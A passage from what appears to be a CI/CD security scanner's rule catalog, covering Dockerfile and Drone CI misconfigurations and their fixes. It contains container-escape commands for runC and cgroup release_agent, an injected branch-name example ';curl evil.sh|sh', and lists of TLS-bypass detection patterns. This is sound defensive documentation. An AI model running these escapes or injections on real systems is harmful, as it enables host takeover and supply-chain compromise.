Recommendation. Resolve every base image to its current digest (docker buildx imagetools inspect <ref> prints it) and pin via FROM repo@sha256:<digest>. Automate refreshes with Renovate or Dependabot. A floating tag (:latest, :3, no tag) silently swaps the build base under every rebuild.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Seen in the wild.

  • Docker Hub typosquatting / namespace-takeover incidents (2017 onward): docker-library Sysdig and Aqua research documented thousands of malicious images uploaded under near-miss names (alpine vs alphine, etc.) and occasional namespace recoveries shipping crypto-miners downstream. Digest-pinned consumers are immune; tag-pinned consumers pull whatever sits under the name today.
  • Codecov codecov/codecov-action tag-mutation incident (post-Codecov-Bash-uploader compromise): the upstream rotated the action's @v3 tag during the fallout, and consumers pinning to the tag silently re-ran a different build than before. Digest pinning would have surfaced the change as a checksum mismatch instead of a silent swap.

Source: DF-001 in the Dockerfile provider.

DF-002: Container runs as root (missing or root USER directive) HIGH 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Multi-stage builds: only the final stage matters for runtime identity, since intermediate stages don't ship. The check scopes USER to the last FROM through end-of-file.

Recommendation. Add a USER <non-root> directive after package install steps (e.g. USER 1001 or USER appuser). Running as root inside a container is not isolation, a kernel CVE, a misconfigured mount, or a mis-applied capability collapses straight into the host.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Seen in the wild.

  • CVE-2019-5736 (runC host breakout): a malicious container running as root could overwrite the host's runC binary and compromise every other container on the node. Non-root containers were not exploitable.
  • CVE-2022-0492 (cgroups v1 escape via release_agent): root inside a container with CAP_SYS_ADMIN could write to the host's release_agent file and execute arbitrary host code. Containers running as a non-root UID side-stepped the exploit class entirely.

Proof of exploit.

Vulnerable: image runs as root by default (no USER set).

FROM ubuntu:22.04 RUN apt-get update && apt-get install -y python3 COPY app.py /app/ CMD ["python3", "/app/app.py"]

Attack: when the container is breached (RCE in the app, a

kernel CVE, a misconfigured mount), the attacker runs as

UID 0. From there:

# CVE-2019-5736 path: overwrite /proc/self/exe to corrupt

# the host's runC binary — every container on the node

# the next launch executes attacker code on the host:

echo '#!/bin/sh\n/attacker_payload' > /proc/self/exe

# CVE-2022-0492 path: cgroup release_agent escape:

mkdir /tmp/cg && mount -t cgroup -o memory cgroup /tmp/cg

echo '/payload' > /tmp/cg/release_agent

echo 1 > /tmp/cg/notify_on_release

A non-root UID makes both paths fail at the first syscall.

Safe: drop to a dedicated unprivileged user.

FROM ubuntu:22.04 RUN apt-get update && apt-get install -y python3 \ && useradd --uid 1001 --create-home app COPY --chown=app:app app.py /app/ USER 1001 CMD ["python3", "/app/app.py"]

Source: DF-002 in the Dockerfile provider.

DF-003: ADD pulls remote URL without integrity verification HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-9 Improper Artifact Integrity Validation.

How this is detected. ADD with a URL is the historical Dockerfile footgun: it fetches at build time over HTTP(S) with no checksum and no signature, and the registry tag does not pin the source. A tampered server or DNS hijack silently swaps the content. COPY is for local files; RUN curl + verify is for remote ones.

Recommendation. Replace ADD https://... with a multi-step RUN: download the file with curl -fsSLo, verify a known-good checksum (sha256sum -c) or signature (cosign verify-blob), then extract / install. Better still: download the artifact in a builder stage and COPY it across. That way the verifier runs once at build time, not per-pull.

Source: DF-003 in the Dockerfile provider.

DF-004: RUN executes a remote script via curl-pipe / wget-pipe HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Reuses _primitives/remote_script_exec.scan so the vocabulary matches the equivalent CI-side rules (GHA-016, GL-016, BB-012, ADO-016, CC-016, JF-016).

Recommendation. Download to a file, verify checksum or signature, then execute. curl -fsSL <url> -o /tmp/x.sh && sha256sum -c <(echo '<digest> /tmp/x.sh') && bash /tmp/x.sh. Vendor installers from well-known hosts (rustup.rs, get.docker.com, ...) are reported with vendor_trusted=true so reviewers can calibrate.

Source: DF-004 in the Dockerfile provider.

DF-005: RUN uses shell-eval (eval / sh -c on a variable / backticks) HIGH

Evidences: CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. Reuses _primitives/shell_eval.scan, same primitive used by GHA-028 / GL-026 / BB-026 / ADO-027 / CC-027 / JF-030 so the safe / unsafe vocabulary matches across the tool.

Recommendation. Replace eval "$X" and sh -c "$X" with explicit argv invocations. If the build genuinely needs a templated command, render it through a sealed config file or use RUN --mount=type=secret with explicit input. $( … ) / backticks should never wrap interpolated user-controlled vars inside a Dockerfile.

Source: DF-005 in the Dockerfile provider.

DF-006: ENV or ARG carries a credential-shaped literal value CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Reuses _primitives/secret_shapes, flags AKIA-prefixed AWS keys outright (the literal AWS access-key shape) and credential-named keys (API_KEY, DB_PASSWORD, SECRET_TOKEN) when the value is a non-empty literal.

Recommendation. Never hard-code credentials in a Dockerfile. ENV values are baked into the image layer history, even if the value is later overwritten, docker history --no-trunc reads the original. Use RUN --mount=type=secret for build-time secrets or runtime env injection (docker run -e SECRET=…) for runtime ones. Rotate any secret already exposed.

Source: DF-006 in the Dockerfile provider.

DF-007: No HEALTHCHECK directive declared LOW 🔧 fix

Evidences: CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. This is a defense-in-depth signal rather than an exploitation indicator, severity is LOW. A missing healthcheck doesn't create a vulnerability on its own, but downstream orchestrators (Kubernetes, ECS, Compose) cannot recover an unhealthy container they cannot detect, and that turns a soft failure (slow leak, deadlock) into a stale-process incident.

Recommendation. Declare a HEALTHCHECK so the orchestrator can detect stuck or zombie containers. Example: HEALTHCHECK --interval=30s --timeout=5s --retries=3 CMD curl -fsS http://localhost/healthz || exit 1. Skip this for builder/multi-stage intermediate images, only the runtime image needs one.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: DF-007 in the Dockerfile provider.

DF-008: RUN invokes docker --privileged or escalates capabilities HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Mirrors GHA-017 / GL-017 / BB-013 / ADO-017 / CC-017 / JF-017 (docker run --privileged in CI scripts) but at Dockerfile build time. The risk is subtler: a privileged RUN step doesn't directly elevate the resulting image, but it gives the build host's docker daemon a chance to escape, and any tampered base image can exploit the elevated build.

Recommendation. A Dockerfile build step almost never legitimately needs --privileged or --cap-add SYS_ADMIN / ALL. If the build genuinely requires elevated capabilities (e.g. compiling a kernel module), do it in a sealed builder image and COPY the artifact out, don't carry the privileged execution into the runtime image.

Source: DF-008 in the Dockerfile provider.

DF-009: ADD used where COPY would suffice LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Pure-local ADD <path> <dest> is functionally identical to COPY, but ships extra-feature surface (URL fetch, tarball auto-extract) that adds nothing and turns a benign-looking filename change into a behavior change. The Docker docs have recommended COPY for non-URL inputs since 2014.

Recommendation. Replace ADD ./local with COPY ./local. ADD has two implicit behaviors that make it the wrong default. It fetches HTTP(S) URLs and it auto-extracts .tar / .tar.gz archives. Both are easy to invoke accidentally and neither is reproducible. Reserve ADD for a deliberate URL-pull (covered by DF-003) or an explicit tarball extract.

Source: DF-009 in the Dockerfile provider.

DF-010: apt-get dist-upgrade / upgrade pulls unknown package versions LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Running apt-get upgrade (or dist-upgrade) inside a Dockerfile is the classic pet-vs-cattle anti-pattern. Two back-to-back builds with the same Dockerfile can produce different images because the upstream archive moved between the two RUN invocations. dist-upgrade additionally relaxes dependency resolution. It can install / remove arbitrary packages to satisfy upgrades, so the resulting image's package set isn't even bounded by what the Dockerfile declares.

Recommendation. Drop the upgrade step. Build on a recent base image instead (rebuild your image when the base image gets a security patch, pin the base by digest per DF-001 so the rebuild is deterministic). apt-get install pkg=<version> for specific packages stays reproducible; upgrade / dist-upgrade does not.

Source: DF-010 in the Dockerfile provider.

DF-011: Package manager install without cache cleanup in same layer LOW

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Each Dockerfile RUN produces a layer. Installing packages in one layer and cleaning the cache in a later layer leaves the cache files in the lower layer forever, final image size is unchanged and the residual files broaden the attack surface (e.g. apt's signed-by keys, package metadata). The fix is layout, not behavior: do install + cleanup in the same RUN.

Recommendation. Combine the install and cleanup into the same RUN so the cache lands in a single layer that gets discarded together. Idiomatic pattern: RUN apt-get update && apt-get install -y <pkgs> && rm -rf /var/lib/apt/lists/*. Equivalent forms: apk add --no-cache <pkgs>, dnf install -y … && dnf clean all, yum install -y … && yum clean all, zypper -n in … && zypper clean -a.

Source: DF-011 in the Dockerfile provider.

DF-012: RUN invokes sudo HIGH

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. sudo inside a Dockerfile is almost always a copy-paste from a host README. Its presence usually means one of three things, all of them wrong: (a) the build is silently running as root and the operator misread it, (b) the image carries an unrestricted sudoers line that a runtime escape can abuse, or (c) the package install chain depends on TTY-aware sudo behavior that breaks under non-TTY docker build. None of these cases benefit from keeping the directive.

Recommendation. Drop sudo from the RUN. Either the build is already running as root (the default before any USER directive), in which case sudo is no-op noise, or the build switched to a non-root USER and needs root for a specific step, in which case temporarily revert with USER root for that RUN and switch back afterward.

Source: DF-012 in the Dockerfile provider.

DF-013: EXPOSE declares sensitive remote-access port CRITICAL 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. EXPOSE is documentation, not a firewall. It doesn't actually open the port. But EXPOSE 22 is a strong signal the image runs sshd, and any remote-access daemon inside the container blows up the threat model: now you have an extra auth surface, an extra service to keep patched, and a way for a compromised app to phone home from the outside. The container runtime / orchestrator's exec path covers every operational use case sshd traditionally served.

Recommendation. Remove the EXPOSE line for the remote-access port. If the operator legitimately needs to reach the container, exec into it (docker exec / kubectl exec). That path uses the orchestrator's auth and audit, doesn't open a network port, and doesn't ship an extra daemon inside the image. Containers should not run sshd / telnetd / ftpd / rsh-d / vncd / RDP alongside the application.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: DF-013 in the Dockerfile provider.

DF-014: WORKDIR set to a system / kernel filesystem path CRITICAL

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Subsequent directives in the Dockerfile (COPY src dest, RUN writes, ADD …) resolve relative paths against the active WORKDIR. A WORKDIR /sys followed by COPY conf.txt config.txt writes into the kernel's sysfs surface, at best a build-time error, at worst a container-escape primitive that lets a compromised step manipulate cgroups, devices, or kernel config.

Recommendation. Move WORKDIR to a dedicated app directory (/app, /srv/app, /opt/<service>). System paths like /sys, /proc, /dev, /etc, / and the root home are not application directories, pointing the working dir at one means subsequent COPY / RUN writes target kernel-exposed namespaces or admin-only configuration.

Source: DF-014 in the Dockerfile provider.

DF-015: RUN grants world-writable permissions (chmod 777 / a+w) MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. World-writable directories under / are an established container-escape vector: any compromised process running as non-root can drop a payload that root-owned daemons later execute. The rule fires on the literal 777, a+w, and a+rwx modes; the more conservative 775 and ugo+x are not flagged.

Recommendation. Replace chmod 777 <path> with the narrowest permissions the workload actually needs. chmod 755 is enough for executables under a read-only root filesystem; 640 or 600 for files the runtime user reads. a+w is almost always copy-pasted from a SO answer and almost never the correct fix.

Known false positives.

  • Test fixtures or scratch builds that intentionally share a directory across multiple non-root users may legitimately use 777. Suppress with an ignore-file entry rather than weakening the rule.

Source: DF-015 in the Dockerfile provider.

DF-016: Image lacks OCI provenance labels LOW

Evidences: CICD-SEC-3 Dependency Chain Abuse, CICD-SEC-9 Improper Artifact Integrity Validation, CICD-SEC-10 Insufficient Logging and Visibility.

How this is detected. The OCI image-spec annotation set is a small de facto standard maintained by the OCI working group. Only image.source and image.revision are checked because they're the two whose absence makes incident response materially harder; image.title / image.description are nice-to-have but the rule doesn't fire on those.

Recommendation. Add a LABEL line carrying at least org.opencontainers.image.source (the URL of the source repo) and org.opencontainers.image.revision (the commit SHA built into the image). Most registries surface those fields in the UI and on manifest inspect, which closes the source-to-image gap that GHA-006 / SLSA Build-L2 provenance attestation also addresses.

Known false positives.

  • A multi-stage build's intermediate stages don't need provenance labels, only the final image ships. The rule fires per Dockerfile, not per stage; suppress for files where the final FROM is intentional throwaway scratch.

Source: DF-016 in the Dockerfile provider.

DF-017: ENV PATH prepends a world-writable directory MEDIUM 🔧 fix

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. A writable PATH entry that comes before the system bins lets any process inside the container shadow ls, ps, apt-get, cat, etc. by dropping a binary of the same name into the writable dir. On a multi-tenant image, or any image where an exploit can reach the filesystem, this is a free privilege-escalation vector.

Recommendation. Don't put /tmp, /var/tmp, /dev/shm, or any other world-writable path in PATH ahead of the system binary directories. Drop those entries entirely, or place them at the tail (ENV PATH=/usr/bin:$PATH:/tmp) so legitimate binaries always shadow anything dropped into the writable dir at runtime.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Source: DF-017 in the Dockerfile provider.

DF-018: RUN chown rewrites ownership of a system path MEDIUM

Evidences: CICD-SEC-7 Insecure System Configuration.

How this is detected. Recognises chown and chgrp invocations whose first non-flag path argument resolves under a system directory. The non-recursive case is also flagged because a single chown user /etc is just as harmful, the recursive flag matters for the size of the blast radius, not for whether it's wrong. Application paths under /opt, /srv, /var/lib/<app>, and /app are not flagged.

Recommendation. Don't chown system directories at build time. If the runtime user needs to own a workload-specific subtree, COPY --chown=<user>:<group> it into the image at the subtree root, or place the workload under a dedicated directory (e.g. /app, /srv/app) and chown only that path. Granting the runtime user write access to /etc, /usr, /sbin, or /lib lets a process exploit later steps to stage a binary the system trusts.

Source: DF-018 in the Dockerfile provider.

DF-019: COPY/ADD source path looks like a credential file HIGH 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Fires on any COPY or ADD whose source basename is a well-known credential filename (id_rsa, .npmrc, .netrc, .env, terraform.tfvars, …) or whose path tail matches a canonical credential location (.aws/credentials, .docker/config.json, .kube/config). Files with private-key extensions (.pem, .key, .p12, .pfx, .jks) are also flagged. Globs are not expanded, the rule reads the literal source token.

Recommendation. Don't COPY credential files into an image. Anything baked into a layer is recoverable by anyone who can pull the image, even if a later step deletes the file. For build-time secrets (npm tokens, registry credentials, SSH deploy keys), use RUN --mount=type=secret,id=<name> so the value lives only for the duration of the step. For runtime secrets, mount them from the orchestrator (Kubernetes Secret, ECS task role, Vault sidecar) instead.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • Empty placeholder files (.env shipped as a template, config.json carrying only public flags). Suppress with a brief .pipelinecheckignore rationale and prefer an explicit non-secret name (.env.example).

Source: DF-019 in the Dockerfile provider.

DF-020: ARG declares a credential-named build argument HIGH 🔧 fix

Evidences: CICD-SEC-6 Insufficient Credential Hygiene.

How this is detected. Complements DF-006 (which flags an ENV/ARG with a literal credential-shaped value). This rule fires on the name alone, ARG NPM_TOKEN, ARG GITHUB_PAT, ARG DB_PASSWORD, even when no default is set, because BuildKit records the resolved value in the image's history the moment --build-arg supplies one. Names are matched via the same _primitives/secret_shapes regex used by the other secret-name rules.

Recommendation. Don't pass secrets through ARG. Build arguments are recorded in docker history whether the value comes from a default or from --build-arg at build time, so a credential-named ARG leaks the secret to anyone who can pull the image. Use RUN --mount=type=secret,id=<name> and feed the value with BuildKit's --secret flag, the secret never lands in a layer or in the build history.

Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.

Known false positives.

  • An ARG whose name matches the regex but is a non-secret config knob (a counter-example like ARG TOKEN_LIMIT). Rare; rename or suppress the finding with a brief rationale.

Source: DF-020 in the Dockerfile provider.

DR-001: Step image not pinned to a digest HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detection mirrors the GL-001 / JF-009 / ADO-009 / CC-003 family: any container image: whose ref doesn't end in @sha256:<64 hex> fires. :latest and missing-tag references emit the strongest message; a specific-version tag (golang:1.21.5) still fires but can be fixed with a one-line digest swap. The rule scopes itself to type: docker / kubernetes pipelines (the container-flavored ones); ssh / exec / digitalocean pipelines have no image: field and pass-by-default.

Recommendation. Pin every step image: (and every services: image) to @sha256:<digest>. Drone resolves the image ref at run time, so a tag like golang:1.21 resolves against whatever the registry currently serves and a compromised registry can swap content under a fixed tag. Capture the digest once with docker buildx imagetools inspect golang:1.21 (or crane digest golang:1.21) and update the digest deliberately when the upstream version moves.

Known false positives.

  • Local-build images (image: my-org/build-tools:dev produced upstream in the same pipeline) sometimes can't be digest-pinned because the digest depends on the build. Suppress via ignore-file scoped to the specific step name when this is the deliberate shape; the floating-tag risk still applies to every public-registry pull.

Source: DR-001 in the Drone CI provider.

DR-002: Step runs with privileged: true HIGH

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. Drone's privileged: true is a step-scoped switch that maps directly to docker run --privileged. The rule fires on either steps or services declaring the flag. The agent admin can also globally allow / deny privileged steps via the trusted-flag on the repository, the rule doesn't try to reach into Drone's server config and assumes the worst (a malicious or accidentally-trusted repo) so a privileged: true in source is always a finding.

Recommendation. Drop privileged: true from the step. The flag removes the container's syscall and capability boundary, giving the step kernel-level access to the agent host. Most workloads that reach for it are Docker-in-Docker pipelines that can use a rootless alternative (buildx, kaniko, buildah --isolation=chroot) instead. If the workload genuinely needs syscalls, scope down with explicit cap_add: [SYS_ADMIN] and an isolated runner pool, rather than blanket privileged.

Source: DR-002 in the Drone CI provider.

DR-003: Untrusted Drone template variable in shell command HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-4 Poisoned Pipeline Execution.

How this is detected. User-controllable substitution sources flagged by this rule:

  • DRONE_COMMIT_MESSAGE / DRONE_COMMIT_AUTHOR*
  • DRONE_PULL_REQUEST_TITLE / DRONE_PULL_REQUEST_BRANCH
  • DRONE_TAG_MESSAGE (tag annotations are author-controlled)
  • DRONE_BRANCH / DRONE_SOURCE_BRANCH / DRONE_TARGET_BRANCH (branch names are pushable, so an attacker can craft a name like ;curl evil.sh|sh)
  • DRONE_REPO_* (in fork PRs the repo metadata comes from the fork)

The rule only fires on unquoted uses inside a command body. Quoted ("${DRONE_*}") or single-quoted uses are safe in POSIX shell because the substitution runs after Drone's templating but the shell still tokenises the expanded value as a single argument. Same model as the Tekton TKN-003 / Argo ARGO-005 / Buildkite BK-003 rules in this catalog.

Recommendation. Treat user-controllable Drone template variables as tainted. Drone substitutes ${DRONE_*} tokens before the shell parses the command, so an unquoted use is a textbook command-injection primitive. The safe pattern is to copy the value into the step's environment: block (MSG: ${DRONE_PULL_REQUEST_TITLE}) and reference the env var quoted in the command (echo "$MSG"). Drone's own docs call out the same hardening for build-message / commit-author fields.

Known false positives.

  • Trusted-only Drone variables (DRONE_BUILD_NUMBER, DRONE_BUILD_STATUS, DRONE_REPO_NAMESPACE for non-fork repos) aren't user-controllable and are safe to interpolate unquoted. Drone-template syntax can also appear in YAML strings outside commands:; this rule only scopes itself to step command bodies, so an unquoted use in (say) settings.message: doesn't fire here, those land under DR-004 / SBOM-style audits.

Source: DR-003 in the Drone CI provider.

DR-004: Literal credential in step environment / settings CRITICAL

Evidences: CICD-SEC-6 Insufficient Credential Hygiene, CICD-SEC-7 Insecure System Configuration.

How this is detected. The rule fires on credential-shaped values where the key name suggests a secret (token, password, secret, key, apikey, api_key, access_key, private_key, auth, credentials) and the value is a plain string rather than a {from_secret: NAME} reference. AWS-style AKIA... keys also fire regardless of the key name (matching the AWS canonical access-key shape). Empty strings and the explicit literal null are not flagged: an empty value is a configuration bug, not a leaked credential. Same model as BK-002 / TKN-005 / ARGO-006 in this catalog.

Recommendation. Move every literal credential into a Drone secret (drone secret add --repository OWNER/REPO --name MY_SECRET --value ...) and reference it via the from_secret: mechanism: MY_SECRET: { from_secret: MY_SECRET }. The same applies to plugin settings: blocks. Drone redacts from_secret values from log output but does NOT redact literals, so a pasted token in source ends up in the build log indefinitely.

Known false positives.

  • Configuration values that happen to use a credential-shaped key name but never carry a secret (DOCKER_CONFIG=/dev/null to suppress credential loading) sometimes trip this rule. Suppress via ignore-file scoped to the specific step name when this is the deliberate shape; the broader credential-vocab match still catches real leaks elsewhere in the pipeline.

Source: DR-004 in the Drone CI provider.

DR-005: Plugin step uses a floating image tag HIGH

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Drone treats a step as a plugin when it has a settings: block. The image: field still names the container that runs, and the same supply-chain argument as DR-001 applies; this rule fires specifically on plugin steps using a floating tag (:latest, no tag, or a non-version-shaped tag) rather than every unpinned image, so a maintainer weighing trade-offs can ratchet plugin pinning up first. A pinned-version tag (plugins/docker:20.13.0) passes this rule but still trips DR-001 for the wider supply-chain hardening.

Recommendation. Pin every plugin step's image: to @sha256:<digest> or, at minimum, a specific version tag (plugins/docker:20.13.0 rather than plugins/docker:latest or plugins/docker). Plugin steps are a sharper attack surface than ordinary steps because Drone passes every settings: key to the plugin as an environment variable, including any secret references; a malicious plugin replacement can exfiltrate the entire credential set the step was trusted with.

Known false positives.

  • Internal-registry plugins built and pushed by the same pipeline (image: my-org/internal-plugin:dev produced upstream) sometimes can't be exact-pinned. Suppress via ignore-file scoped to the specific step name when this is the deliberate shape.

Source: DR-005 in the Drone CI provider.

DR-006: TLS verification disabled in step commands HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detection is the same blob-regex used by GHA-027, BK-008, JF-022, ADO-026, CC-024, and the CFN/Terraform rule packs. Matches: curl --insecure / -k, wget --no-check-certificate, pip config set global.trusted-host, npm config set strict-ssl false, yarn config set strict-ssl false, git config http.sslverify false, GIT_SSL_NO_VERIFY=1, NODE_TLS_REJECT_UNAUTHORIZED=0, PYTHONHTTPSVERIFY=0, and GOINSECURE=.... The rule scans every commands: entry on every step.

Recommendation. Remove TLS-bypass flags from build commands. The most common offenders are curl --insecure / -k / wget --no-check-certificate, pip config set global.trusted-host, npm config set strict-ssl false, and git -c http.sslverify=false. Each exposes the build to TLS-MITM injection of a registry-served payload, which is a textbook supply-chain attack vector. If a registry's certificate is genuinely broken, fix the registry rather than permanently disabling verification, the bypass tends to outlive the broken cert and become a permanent weakness.

Source: DR-006 in the Drone CI provider.

DR-007: Step mounts a sensitive host path HIGH

Evidences: CICD-SEC-5 Insufficient PBAC.

How this is detected. Drone's pipeline-level volumes: block accepts either temp: (an ephemeral tmpfs, safe) or host: { path: ... } (a bind mount of the agent's filesystem, the dangerous shape). The rule fires when any pipeline-level volume's host.path matches a sensitive prefix:

  • /var/run/docker.sock — the canonical Docker-in-Docker escape; equivalent to --privileged for container takeover purposes;
  • /var/lib/docker — exposes every image / container on the host;
  • /etc — config + credential files;
  • /proc / /sys — host kernel state;
  • / — full host takeover.

The rule fires on the volume declaration, not on step-level mounts. A pipeline that declares a sensitive host volume but no step actually mounts it is still flagged: the declaration alone signals the agent's Drone runner is configured to permit the bind mount, which is itself a risk-shape decision worth review.

Recommendation. Drop the host volume from the pipeline. Mounting /var/run/docker.sock from the agent host into a build container hands the container root-equivalent control over every other workload on the same agent (it can spawn arbitrary containers, including privileged ones). /var/lib/docker exposes every image and container on the host, /proc and /sys expose the host kernel state, and / (the host root) is full takeover. If the build genuinely needs Docker, run a rootless alternative (kaniko, buildah --isolation=chroot, docker buildx against a remote builder) or use Drone's trusted: true repo flag plus a dedicated host-isolated runner pool, rather than mounting the shared host's socket.

Known false positives.

  • Trusted-only pipelines on a dedicated runner fleet (no fork-PR access, no untrusted contributors) sometimes deliberately mount the Docker socket for image build / push workflows. Suppress via ignore-file when this is the deliberate posture and the runner pool's isolation is documented elsewhere; the rule has no way to know whether trusted: true is set on the repo from the pipeline YAML alone.

Source: DR-007 in the Drone CI provider.

DR-008: Step uses pull: never (skips registry verification) MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Drone supports three pull: policies on a step: always (re-fetch + verify on every build, the default), if-not-exists (use cache when present, otherwise pull), and never (use cache only). The never policy is the dangerous one because it skips the digest verification an always pull would perform, and there's no out-of-band signal that the cached image is the one the manifest names. The rule fires on either steps or services declaring pull: never. pull: if-not-exists is treated as acceptable: it's tolerable when paired with a digest-pinned image: (DR-001) and a deliberate operational decision; the explicit-skip case (never) is what TAINT-class supply-chain attacks lean on.

Recommendation. Drop the pull: never directive (or change it to pull: always / pull: if-not-exists). pull: never tells the Drone agent to skip the registry round-trip entirely, so the agent runs whatever image bytes it cached on a previous build without re-verifying the digest. If a compromised image ever landed in the agent's local cache (a poisoned registry tag, a manual docker pull during a debug session, a co-resident workload that pulled a malicious image), the cached bytes keep running until an operator manually clears the cache. pull: always (the Drone default) re-fetches and verifies on every build; pull: if-not-exists is acceptable when the image is digest-pinned (DR-001) so the cache key is content-addressed.

Known false positives.

  • Air-gapped or registry-pinned environments sometimes set pull: never deliberately because the agent never has registry access in the first place. Suppress via ignore-file when this is the deliberate shape; the runner's network isolation then carries the integrity guarantee instead of the registry round-trip.

Source: DR-008 in the Drone CI provider.

DR-009: Cache plugin key embeds an attacker-controllable Drone variable HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Drone has no first-party cache keyword; pipelines use plugin steps (drone-cache, drone-volume-cache, drone-s3-cache, etc.) configured via settings:. The rule fires on any plugin step whose settings.cache_key (or related key, mount, filename, restore_keys) interpolates a tainted Drone variable. Tainted vocabulary mirrors DR-003: $DRONE_BRANCH, $DRONE_PULL_REQUEST*, $DRONE_COMMIT_*MESSAGE, $DRONE_TAG_MESSAGE, and the fork-PR-shaped $DRONE_REPO_* family. The attack model is well-documented (GHA-011 catches the same shape on the GitHub Actions side).

Recommendation. Don't embed PR-controlled or branch-controlled Drone variables in cache keys. The canonical safe shape is to key on commit-stable inputs only: a checksum of the lockfile (${DRONE_REPO_BRANCH}-${DRONE_COMMIT_SHA} is unique enough; ${DRONE_BRANCH} alone is attacker-controllable). When two builds need to share a cache, key on the dependency manifest's hash, not on any branch / PR / repo metadata that a fork PR can shape. If a fork PR's cache write can ever be read back by a trusted-context build (the same key on a different branch), the attacker can inject malicious build artifacts into the trusted run.

Known false positives.

  • Plugins that namespace cache reads by branch on the write side and never read across branches (a deliberate cache partitioning) are technically safe, the attacker can poison their own branch's cache but can't reach the trusted-branch one. The rule has no way to verify partition boundaries at scan time; suppress via ignore-file scoped to the specific step name when the partitioning is audited.

Source: DR-009 in the Drone CI provider.

DR-010: Step commands run unpinned package installs MEDIUM

Evidences: CICD-SEC-3 Dependency Chain Abuse.

How this is detected. Detection reuses the cross-provider primitives PKG_INSECURE_RE and PKG_NO_LOCKFILE_RE from checks/base.py. The same rule pack already exists for GHA (GHA-021 / GHA-022), GitLab (GL-021 / GL-022), Bitbucket / Azure DevOps / Jenkins / CircleCI / Cloud Build / Buildkite / Tekton / Argo. Drone was the missing port; this closes the gap.

Insecure variants matched (PKG_INSECURE_RE): pip --index-url http://, pip --trusted-host, npm --registry http://, gem --source http://, nuget --Source http://, cargo --index http://. Lockfile-bypass variants (PKG_NO_LOCKFILE_RE): npm install (should be npm ci), bare pip install <pkg> without -r or --require-hashes, yarn install without --frozen-lockfile, bundle install without --frozen, cargo install, go install without an @vN.N pin, poetry install without --no-update.

Recommendation. Pin every package install to a lockfile or a checksum-verified version. For pip, use pip install --require-hashes -r requirements.txt or -r requirements.txt with hashes baked into the lock; pip install <package> without a version pin or lockfile flag is the unsafe shape. For npm, prefer npm ci over npm install so the lockfile is load-bearing. Yarn: yarn install --frozen-lockfile. Bundle: bundle install --frozen. Cargo / go install: always pin to a tag or commit. Do NOT use --trusted-host / --no-verify / a non-HTTPS index URL — those bypass TLS or trust validation entirely (DR-006 covers the TLS subset; this rule covers the lockfile subset).

Known false positives.

  • Bootstrap-stage installs that intentionally pull latest (apt-get install -y curl for a tooling image rebuild) sometimes legitimately bypass the lockfile. Suppress via ignore-file scoped to the specific step name when this is the deliberate shape; the broader pinning policy still covers the rest of the pipeline.

Source: DR-010 in the Drone CI provider.

DR-011: node map interpolates attacker-controllable Drone variable HIGH

Evidences: CICD-SEC-1 Insufficient Flow Control Mechanisms, CICD-SEC-7 Insecure System Configuration.

How this is detected. Drone substitutes ${VAR} template tokens against the build context before the runner picks an agent. The rule walks the pipeline-level node: map (Drone doesn't expose a per-step variant) for any reference to the same author-controllable variables DR-003 tracks (DRONE_BRANCH, DRONE_TAG, DRONE_PULL_REQUEST_*, DRONE_COMMIT_AUTHOR*, DRONE_COMMIT_MESSAGE, DRONE_REPO).

Detection is value-only and case-sensitive against the documented variable names; trusted server-controlled fields like DRONE_BUILD_NUMBER and DRONE_REPO_NAMESPACE (for non-fork repos) aren't on the tainted list. Closes parity with BK-015 / GHA-036 / GL-032 / JF-032 / ADO-030 / CC-031.

